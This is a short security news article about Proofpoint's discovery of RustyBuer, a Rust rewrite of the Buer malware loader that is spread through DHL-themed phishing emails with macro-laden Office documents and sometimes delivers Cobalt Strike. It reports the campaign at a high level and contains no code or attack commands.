Researcher found new variant of Buer Loader written in Rust

Researchers at Proofpoint discovered a new variant of the Buer malware loader that was distributed through emails disguised as shipping notices. Buer is a download program sold on the underground market and first appeared in 2019. It is used as a foothold in the infected network to distribute other malicious software including ransomware.

A new variant of Buer discovered by Proofpoint cybersecurity researchers, written in a completely different coding language from the original malware. This is a very unusual way of change, but it helps new activities remain undetected in attacks against Windows systems. The original Buer was written in the C language, and the new variant was written in the Rust programming language, so the researchers named the new variant RustyBuer.

RustyBuer is usually delivered via phishing emails. In related activities, these emails were designed to come from the courier company DHL. They contain a link to download a malicious Microsoft Word or Excel document and use macros to deliver new malware variants. These emails affected more than 200 organizations in more than 50 industries.

  • The new Buer variant is written in Rust, an efficient and easy-to-use programming language that is becoming increasingly popular. Proofpoint is calling this variant RustyBuer.
  • Rewriting the malware in Rust enables the threat actor to better evade existing Buer detection capabilities.
  • Proofpoint observed RustyBuer campaigns delivering Cobalt Strike Beacon as a second-stage payload in some campaigns.
  • Researchers assess some threat actors may be establishing a foothold with the Buer loader to then sell access to other threat actors. This is known as “access-as-a-service.”

Researchers claim that rewritten malware and the use of new decoys that try to show more legitimacy indicate that threat actors using RustyBuer are developing techniques in a variety of ways to evade detection and try to increase successful click-through rates. Research said that new variants will appear in the future based on the observed frequency of RustyBuer activity.